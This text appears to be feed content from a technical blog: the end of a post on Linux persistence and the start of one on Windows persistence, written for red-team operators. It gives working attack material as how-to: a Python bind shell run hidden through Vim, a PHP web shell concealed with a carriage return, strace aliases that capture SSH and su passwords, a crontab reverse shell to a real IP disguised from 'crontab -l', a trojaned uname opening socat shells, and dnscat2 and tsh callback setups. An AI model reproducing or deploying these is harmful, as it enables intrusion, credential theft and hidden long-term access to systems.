gcc &lt;span class="nt"&gt;-DDETACH&lt;/span&gt; &lt;span class="nt"&gt;-m32&lt;/span&gt; &lt;span class="nt"&gt;-Wall&lt;/span&gt; &lt;span class="nt"&gt;-s&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; prism prism.c
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;On the attack machine, await the backdoor connection:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;nc &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt; 9999
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Send the trigger packet to activate the backdoor.&lt;/p&gt;

&lt;h3&gt;
  
  
  DNS Backdoor
&lt;/h3&gt;

&lt;p&gt;Project address: &lt;a href="https://github.com/iagox86/dnscat2" rel="noopener noreferrer"&gt;https://github.com/iagox86/dnscat2&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Even in the most restrictive environments, the target will almost certainly be allowed to resolve external or internal domain names over DNS. This can serve as a C2 channel: commands and data are embedded in DNS queries and responses, which makes detection more difficult because the commands are hidden among normal-looking traffic.&lt;/p&gt;

&lt;p&gt;We will utilise &lt;code&gt;dnscat2&lt;/code&gt; to implement this.&lt;/p&gt;

&lt;p&gt;My macOS installation ran into problems; the environment proved troublesome, so I reverted to Kali and ultimately used the host machine. The server's Gemfile needs its gem source changed; specifying &lt;code&gt;https://gems.ruby-china.com/&lt;/code&gt; directly in the Gemfile is recommended (note that this replaces the default gem source with a third-party mirror).&lt;/p&gt;

&lt;p&gt;My configuration:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight ruby"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Gemfile&lt;/span&gt;
&lt;span class="c1"&gt;# By Ron Bowes&lt;/span&gt;
&lt;span class="c1"&gt;#&lt;/span&gt;
&lt;span class="c1"&gt;# See LICENSE.md&lt;/span&gt;

&lt;span class="n"&gt;source&lt;/span&gt; &lt;span class="s1"&gt;'https://gems.ruby-china.com/'&lt;/span&gt;

&lt;span class="n"&gt;gem&lt;/span&gt; &lt;span class="s1"&gt;'trollop'&lt;/span&gt; &lt;span class="c1"&gt;# Commandline parsing&lt;/span&gt;
&lt;span class="n"&gt;gem&lt;/span&gt; &lt;span class="s1"&gt;'salsa20'&lt;/span&gt; &lt;span class="c1"&gt;# Encrypted connections&lt;/span&gt;
&lt;span class="n"&gt;gem&lt;/span&gt; &lt;span class="s1"&gt;'sha3'&lt;/span&gt;    &lt;span class="c1"&gt;# Message signing + key derivation&lt;/span&gt;
&lt;span class="n"&gt;gem&lt;/span&gt; &lt;span class="s1"&gt;'ecdsa'&lt;/span&gt;   &lt;span class="c1"&gt;# Used for ECDH key exchange&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;$ &lt;/span&gt;gem &lt;span class="nb"&gt;install &lt;/span&gt;bundler
&lt;span class="nv"&gt;$ &lt;/span&gt;bundle &lt;span class="nb"&gt;install&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Start the server:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;ruby dnscat2.rb &lt;span class="nt"&gt;--dns&lt;/span&gt; &lt;span class="s2"&gt;"domain=attck.me,host=192.168.123.192"&lt;/span&gt; &lt;span class="nt"&gt;--no-cache&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then compile the client; simply run &lt;code&gt;make&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;./dnscat &lt;span class="nt"&gt;--dns&lt;/span&gt; &lt;span class="nv"&gt;server&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;192.168.123.192
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;On the host machine:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;session &lt;span class="nt"&gt;-i&lt;/span&gt; 1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I will capture packets to observe how communication occurs.&lt;/p&gt;

&lt;p&gt;All commands are transmitted via DNS traffic.&lt;/p&gt;

&lt;p&gt;You may test the PowerShell version of dnscat2.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;Start-Dnscat2&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-Domain&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;attck.me&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-DNSServer&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;192.168.123.192&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It is now online.&lt;/p&gt;

&lt;p&gt;Then open a new interactive shell.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
Using dnscat2 offers several advantages:  &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Supports multiple sessions
&lt;/li&gt;
&lt;li&gt;Traffic encryption
&lt;/li&gt;
&lt;li&gt;Protection against MiTM attacks via keys
&lt;/li&gt;
&lt;li&gt;Ability to run PowerShell scripts directly from memory&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;
  
  
  VIM Backdoor
&lt;/h3&gt;

&lt;p&gt;First, construct a malicious script &lt;code&gt;excalibra.py&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;socket&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;subprocess&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;threading&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;time&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;__main__&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;server&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nf"&gt;socket&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;AF_INET&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;SOCK_STREAM&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;server&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;bind&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;0.0.0.0&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;666&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="n"&gt;server&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;listen&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;print&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;waiting for connect&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;
        &lt;span class="n"&gt;talk&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;server&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;accept&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="k"&gt;print&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;connect from&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;addr&lt;/span&gt;
        &lt;span class="n"&gt;proc&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;subprocess&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;Popen&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;/bin/sh&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;-i&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="n"&gt;stdin&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;talk&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                &lt;span class="n"&gt;stdout&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;talk&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;talk&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;shell&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="bp"&gt;True&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The prerequisite is that Vim was built with Python support; the default installation includes it.&lt;/p&gt;

&lt;p&gt;The script can be placed in Python's extension directory:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;nohup &lt;/span&gt;vim &lt;span class="nt"&gt;-E&lt;/span&gt; &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;"py3file excalibra.py"&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; /dev/null 2&amp;gt;&amp;amp;1 &amp;amp;&lt;span class="si"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;sleep &lt;/span&gt;2 &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="nt"&gt;-f&lt;/span&gt; excalibra.py
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;One can observe the vim process in the background, but not the Python process.&lt;/p&gt;

&lt;p&gt;Principle reference: &lt;a href="https://github.com/jaredestroud/WOTD" rel="noopener noreferrer"&gt;https://github.com/jaredestroud/WOTD&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  PAM Backdoor
&lt;/h3&gt;

&lt;p&gt;PAM (Pluggable Authentication Modules) is an authentication mechanism proposed by Sun. It provides a set of dynamic link libraries and a unified API, separating the service provided by the system from its authentication method. This enables system administrators to flexibly configure different authentication methods for different services without modifying the service programmes, and also facilitates the addition of new authentication mechanisms to the system.&lt;/p&gt;

&lt;p&gt;Project address: &lt;a href="https://github.com/litsand/shell" rel="noopener noreferrer"&gt;https://github.com/litsand/shell&lt;/a&gt;&lt;br&gt;&lt;br&gt;
This is an automated script. It is more suited to CentOS; my test environment was Ubuntu, so I will not reproduce it for the time being.&lt;/p&gt;
&lt;h3&gt;
  
  
  Carriage Return Backdoor (&lt;code&gt;\r&lt;/code&gt;)
&lt;/h3&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;echo -e "&lt;span class="cp"&gt;&amp;lt;?=&lt;/span&gt;&lt;span class="err"&gt;\`\&lt;/span&gt;&lt;span class="nv"&gt;$_POST&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;excalibra&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="err"&gt;\`&lt;/span&gt;&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;\r&lt;span class="cp"&gt;&amp;lt;?=&lt;/span&gt;&lt;span class="s1"&gt;'Excalibra  '&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;" &amp;gt;/var/www/html/excalibra.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Because &lt;code&gt;echo -e&lt;/code&gt; writes the &lt;code&gt;\r&lt;/code&gt; carriage return into the file, viewing the source directly in a terminal only reveals the latter half: the terminal returns to the start of the line and the second part overwrites the first.&lt;/p&gt;
&lt;h3&gt;
  
  
  strace Backdoor
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;strace&lt;/code&gt; is often used to trace the system calls and signals received during a process's execution. In the Linux world, processes cannot directly access hardware devices; when a process needs to access hardware (e.g., reading disk files, receiving network data), it must switch from user mode to kernel mode and access the hardware through system calls. &lt;code&gt;strace&lt;/code&gt; can trace the system calls generated by a process, including parameters, return values, and execution time consumed.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;ssh&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'strace   -o   /tmp/sshpwd-`date    '&lt;/span&gt;+%d%h%m%s&lt;span class="s1"&gt;'`.log  \
 -e read,write,connect  -s2048 ssh'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is similar to the alias backdoor.&lt;/p&gt;

&lt;p&gt;When testing with Docker, include the &lt;code&gt;--privileged&lt;/code&gt; parameter.&lt;/p&gt;

&lt;p&gt;Similarly, one can record other commands:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;su&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'strace   -o   /tmp/sulog-`date    '&lt;/span&gt;+%d%h%m%s&lt;span class="s1"&gt;'`.log  \
 -e read,write,connect  -s2048 su'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Tiny shell
&lt;/h3&gt;

&lt;p&gt;Project address: &lt;a href="https://github.com/orangetw/tsh" rel="noopener noreferrer"&gt;https://github.com/orangetw/tsh&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Compile under Linux:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;./compile.sh linux 149.129.72.186 1234 excalibra 22
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The parameters represent:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;usage:
compile.sh os BC_HOST BC_PORT &lt;span class="o"&gt;[&lt;/span&gt;PASSWORD] &lt;span class="o"&gt;[&lt;/span&gt;BC_DELAY]
compile.sh os 8.8.8.8 8081
compile.sh os 8.8.8.8 8081 mypassword 60


Please specify one of these targets:

    compile.sh linux
    compile.sh freebsd
    compile.sh openbsd
    compile.sh netbsd
    compile.sh cygwin
    compile.sh sunos
    compile.sh irix
    compile.sh hpux
    compile.sh osf
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Upon success, the files &lt;code&gt;tsh&lt;/code&gt; and &lt;code&gt;tshd&lt;/code&gt; are generated, representing the client and server respectively.&lt;br&gt;&lt;br&gt;
Run on the target:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;umask &lt;/span&gt;077&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nv"&gt;HOME&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;/var/tmp ./tshd
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;On the attack machine:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;tsh targetip
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A shell will be obtained. Additionally, file upload and download are supported.&lt;/p&gt;

&lt;p&gt;Reverse connection form.&lt;/p&gt;

&lt;h3&gt;
  
  
  Browser Plugin Backdoor
&lt;/h3&gt;

&lt;p&gt;Project address: &lt;a href="https://github.com/graniet/chromebackdoor" rel="noopener noreferrer"&gt;https://github.com/graniet/chromebackdoor&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I spent considerable time testing this project, but have not yet succeeded; it is unclear whether the browser imposes restrictions.&lt;/p&gt;

&lt;h3&gt;
  
  
  Local Job Scheduling
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Crontab
&lt;/h4&gt;

&lt;p&gt;Test environment: macOS&lt;br&gt;&lt;br&gt;
Scheduled reverse shell:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="o"&gt;(&lt;/span&gt;crontab &lt;span class="nt"&gt;-l&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="nb"&gt;printf&lt;/span&gt; &lt;span class="s2"&gt;"*/1 * * * * /usr/bin/nc 30.157.170.75 1389 /bin/sh;&lt;/span&gt;&lt;span class="se"&gt;\r&lt;/span&gt;&lt;span class="s2"&gt;no crontab for &lt;/span&gt;&lt;span class="sb"&gt;`&lt;/span&gt;&lt;span class="nb"&gt;whoami&lt;/span&gt;&lt;span class="sb"&gt;`&lt;/span&gt;&lt;span class="s2"&gt;%100c&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;|crontab -
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Other Backdoor
&lt;/h3&gt;

&lt;p&gt;Project address: &lt;a href="https://github.com/iamckn/backdoors" rel="noopener noreferrer"&gt;https://github.com/iamckn/backdoors&lt;/a&gt;&lt;br&gt;&lt;br&gt;
Some process hiding techniques, followed by a reverse shell.&lt;/p&gt;

&lt;p&gt;Demonstration using &lt;code&gt;uname&lt;/code&gt;:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;uname.sh&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;#uname&lt;/span&gt;
&lt;span class="c"&gt;#-------------------------&lt;/span&gt;
&lt;span class="nb"&gt;touch&lt;/span&gt; /usr/local/bin/uname

&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt; &amp;gt;&amp;gt; /usr/local/bin/uname
#!/bin/bash
#nc.traditional -l -v -p 4444 -e /bin/bash 2&amp;gt;/dev/null &amp;amp;
#socat TCP4-Listen:3177,fork EXEC:/bin/bash 2&amp;gt;/dev/null &amp;amp;
socat SCTP-Listen:1177,fork EXEC:/bin/bash 2&amp;gt;/dev/null &amp;amp;
#perl -MIO -e'&lt;/span&gt;&lt;span class="nv"&gt;$s&lt;/span&gt;&lt;span class="sh"&gt;=new IO::Socket::INET(LocalPort=&amp;gt;1337,Listen=&amp;gt;1);while(&lt;/span&gt;&lt;span class="nv"&gt;$c&lt;/span&gt;&lt;span class="sh"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;$s&lt;/span&gt;&lt;span class="sh"&gt;-&amp;gt;accept()){&lt;/span&gt;&lt;span class="nv"&gt;$_&lt;/span&gt;&lt;span class="sh"&gt;=&amp;lt;&lt;/span&gt;&lt;span class="nv"&gt;$c&lt;/span&gt;&lt;span class="sh"&gt;&amp;gt;;print &lt;/span&gt;&lt;span class="nv"&gt;$c&lt;/span&gt;&lt;span class="sh"&gt; `&lt;/span&gt;&lt;span class="nv"&gt;$_&lt;/span&gt;&lt;span class="sh"&gt;`;}' 2&amp;gt;/dev/null &amp;amp;
/bin/uname &lt;/span&gt;&lt;span class="se"&gt;\$&lt;/span&gt;&lt;span class="sh"&gt;@
&lt;/span&gt;&lt;span class="no"&gt;EOF
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Replace the reverse shell command as needed.  &lt;/p&gt;

&lt;h2&gt;
  
  
  0x03 Rootkit
&lt;/h2&gt;

&lt;h3&gt;
  
  
  What is a Rootkit?
&lt;/h3&gt;

&lt;p&gt;In suspenseful spy films, one faction typically dispatches an agent to infiltrate the opposing camp. The agent's excellent disguise allows them to remain undetected for an extended period; to maintain long-term concealment, they avoid high-risk actions that might prematurely expose them. They earn the enemy's trust and attain a high-ranking position, enabling them to continuously acquire vital intelligence and transmit it through unique channels.&lt;/p&gt;

&lt;p&gt;In a sense, this uninvited guest is akin to a Rootkit—a programme that resides persistently and undetectably on a target computer, manipulates the system, and collects data through covert channels. The three essential elements of a Rootkit are: concealment, manipulation, and data collection.&lt;/p&gt;

&lt;p&gt;The term "root" originates from the Unix realm. As the Unix system administrator account is called root—which possesses the fewest security restrictions—fully controlling a host and gaining administrator privileges is referred to as having "rooted" the computer. However, "rooting" a host does not guarantee sustained control, because an administrator may detect the intrusion and take remedial action. Hence, the initial meaning of Rootkit is "a set of tools that can maintain root privileges."&lt;/p&gt;

&lt;p&gt;Simply put, a Rootkit is a special type of malicious software whose function is to hide itself and designated files, processes, and network connections on the installed target. Rootkits are commonly combined with other malicious programmes such as Trojans and backdoors. By loading special drivers and modifying the system kernel, Rootkits achieve the purpose of concealment.&lt;/p&gt;

&lt;p&gt;A typical rootkit includes:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;1 An Ethernet sniffer programme, used to capture usernames and passwords transmitted over the network.&lt;/li&gt;
&lt;li&gt;2 Trojan horse programmes, such as &lt;code&gt;inetd&lt;/code&gt; or &lt;code&gt;login&lt;/code&gt;, to provide a backdoor for the attacker.&lt;/li&gt;
&lt;li&gt;3 Programmes to hide the attacker's directories and processes, such as &lt;code&gt;ps&lt;/code&gt;, &lt;code&gt;netstat&lt;/code&gt;, &lt;code&gt;rshd&lt;/code&gt;, and &lt;code&gt;ls&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;4 It may also include log cleaning tools, such as &lt;code&gt;zap&lt;/code&gt;, &lt;code&gt;zap2&lt;/code&gt;, or &lt;code&gt;z2&lt;/code&gt;, which the attacker uses to delete entries regarding their activities from log files like &lt;code&gt;wtmp&lt;/code&gt;, &lt;code&gt;utmp&lt;/code&gt;, and &lt;code&gt;lastlog&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Some complex rootkits can also offer services like telnet, shell, and finger to the attacker.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Application-Level Rootkit
&lt;/h3&gt;

&lt;p&gt;Application-level rootkits primarily achieve concealment by bulk replacement of system commands—for instance, replacing &lt;code&gt;ls&lt;/code&gt;, &lt;code&gt;ps&lt;/code&gt;, and &lt;code&gt;netstat&lt;/code&gt; to hide files, processes, and network connections. Sometimes a daemon process is present to ensure the stability of the backdoor. Two commonly used Trojans are &lt;code&gt;mafix&lt;/code&gt; and &lt;code&gt;brookit&lt;/code&gt;. Application-level rootkits are relatively easy to remove; the most troublesome are kernel-level and hardware-level rootkits.&lt;/p&gt;

&lt;h3&gt;
  
  
  Kernel-Level Rootkit
&lt;/h3&gt;

&lt;p&gt;These load the backdoor as a kernel module, which is comparatively complex. Kernel backdoors are generally operating-system specific, as kernel module programming varies between operating systems and is not typically portable. Kernel backdoors usually cannot be detected through checks like MD5 verification, since the user-space binaries themselves are left unmodified, making them fundamentally difficult to discover. Currently, kernel backdoors are more prevalent on Linux and Solaris.&lt;/p&gt;

&lt;h3&gt;
  
  
  Hardware-Level Backdoor
&lt;/h3&gt;

&lt;p&gt;This refers to backdoors embedded in the manufacturer's hardware, such as CPUs, motherboards, mice, etc.  &lt;/p&gt;

&lt;p&gt;Demonstration: the example I located should be a kernel rootkit; for other classic kernel rootkits, one may examine these:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/David-Reguera-Garcia-Dreg/enyelkm" rel="noopener noreferrer"&gt;https://github.com/David-Reguera-Garcia-Dreg/enyelkm&lt;/a&gt;&lt;br&gt;&lt;br&gt;
&lt;a href="https://github.com/yaoyumeng/adore-ng" rel="noopener noreferrer"&gt;https://github.com/yaoyumeng/adore-ng&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Reptile
&lt;/h3&gt;

&lt;p&gt;Test environment: Kali&lt;/p&gt;

&lt;p&gt;Project address: &lt;a href="https://github.com/f0rb1dd3n/Reptile" rel="noopener noreferrer"&gt;https://github.com/f0rb1dd3n/Reptile&lt;/a&gt;&lt;/p&gt;

</description>
      <category>linux</category>
      <category>persistence</category>
      <category>cybersecurity</category>
      <category>maintenance</category>
    </item>
    <item>
      <title>Windows Persistence Techniques</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Wed, 10 Jun 2026 08:44:21 +0000</pubDate>
      <link>https://dev.to/excalibra/windows-persistence-techniques-53p8</link>
      <guid>https://dev.to/excalibra/windows-persistence-techniques-53p8</guid>
      <description>&lt;h2&gt;
  
  
  0x00 Preface and Scenario
&lt;/h2&gt;

&lt;p&gt;In red team operations, it is currently common practice to use Cobalt Strike (CS) for unified management of acquired shells or phished targets. However, practical experience reveals that CS does not natively integrate a one‑click persistence function. Many third‑party plugins developed by the community are either incomplete or cumbersome to use, and some even contain bugs that give a false impression of success, ultimately resulting in the loss of the shell.&lt;br&gt;&lt;br&gt;
Consequently, this article collates persistence methods within the Windows environment based on the aforementioned scenario. Subsequently, a selection of the more frequently employed and convenient operations will be integrated into a CS plugin to ensure that access is rapidly maintained immediately after a shell is obtained.&lt;/p&gt;
&lt;h2&gt;
  
  
  0x01 Startup Directory
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Required Privileges:&lt;/strong&gt; With or without elevation.&lt;br&gt;&lt;br&gt;
This is the most common and simplest method of persistence. Programmes or shortcuts placed in this directory execute automatically when a user logs in.&lt;br&gt;&lt;br&gt;
For NT6 and later, the directories are as follows:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="kd"&gt;Current&lt;/span&gt; &lt;span class="kd"&gt;user&lt;/span&gt;:
&lt;span class="kd"&gt;C&lt;/span&gt;:\Users\Username\AppData\Roaming\Microsoft\Windows\Start &lt;span class="kd"&gt;Menu&lt;/span&gt;\Programs\Startup
&lt;span class="kd"&gt;All&lt;/span&gt; &lt;span class="kd"&gt;users&lt;/span&gt;:
&lt;span class="kd"&gt;C&lt;/span&gt;:\ProgramData\Microsoft\Windows\Start &lt;span class="kd"&gt;Menu&lt;/span&gt;\Programs\StartUp
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For pre‑NT6 systems:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="kd"&gt;Current&lt;/span&gt; &lt;span class="kd"&gt;user&lt;/span&gt;:
